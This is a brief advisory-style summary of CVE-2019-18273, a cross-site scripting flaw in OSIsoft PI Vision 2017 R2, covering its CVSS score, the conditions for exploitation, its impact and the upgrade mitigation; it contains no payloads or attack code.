CVE-2019-18273

Vulnerability

A cross-site scripting (XSS) vulnerability (CWE-79) exists in OSIsoft PI Vision versions 2017 R2 and 2017 R2 SP1 [1]. The flaw stems from improper neutralization of user input during web page generation, allowing an attacker to inject malicious scripts. The CVSS v3 base score is 6.4 with a vector string of (AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H), indicating high attack complexity and high privileges required.

Exploitation

An attacker must have high privileges on the PI Vision system (e.g., administrative access) and network connectivity to the application. The attacker then crafts a malicious payload and introduces it into a vulnerable input field. When a different administrator accesses the page containing the injected script, the payload executes, requiring user interaction such as clicking a link or viewing a page [1]. The high complexity suggests that specific conditions must be met for successful exploitation.

Impact

Successful exploitation results in a breach of confidentiality, integrity, and availability — all rated as high impact in the CVSS vector. The attacker can read, modify, or delete sensitive data, and potentially perform actions within the context of the victim administrator's session, leading to full compromise of the PI Vision system [1].

Mitigation

The recommended mitigation is to upgrade to PI Vision 2019 or later, as these versions are not affected by this specific vulnerability [1]. If upgrading is not immediately possible, organizations should implement rigorous input validation and output encoding to reduce the XSS risk. No workaround is publicly documented, and this CVE is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog.